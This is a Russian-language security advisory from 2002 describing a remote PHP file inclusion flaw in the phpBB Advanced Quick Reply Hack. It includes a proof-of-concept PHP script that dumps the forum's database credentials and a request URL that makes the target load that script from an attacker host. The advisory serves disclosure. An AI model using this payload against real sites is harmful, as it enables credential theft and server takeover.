Security Lab

Выполнение произвольного PHP кода в phpBB Advanced Quick Reply Hack

Дата публикации:18.11.2002
Всего просмотров:2020
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Уязвимость, обнаруженная в phpBB Advanced Quick Reply Hack, позволяет удаленному атакующему внедрить путь к 'extension.inc' в сценарии 'quick_reply.php'. В результате, атакующий может внедрить произвольный PHP сценарий из своего источника, который может использоваться для выполнения произвольных команд на Web сервере. Пример:

Создаем сценарий 'extension.inc' на удаленном сервере:

<?php
include('config'.'.php');
echo "DB Type: $dbms <br>";
echo "DB Host: $dbhost <br>";
echo "DB Name: $dbname <br>";
echo "DB User: $dbuser <br>";
echo "DB Pass: $dbpasswd <br>";
exit;
?>
Затем запрос:

http://www.example.com/quick_reply.php?
phpbb_root_path=http://attackersite.tld/&mode=smilies

Раскроет содержание базы данных форума.

Уязвимость обнаружена в RustyDragon phpBB Advanced Quick Reply Hack 1.0-1.1 (phpBB 2.0-2.0.3)

Ссылки: Code Injection in phpBB Advanced Quick Reply Mod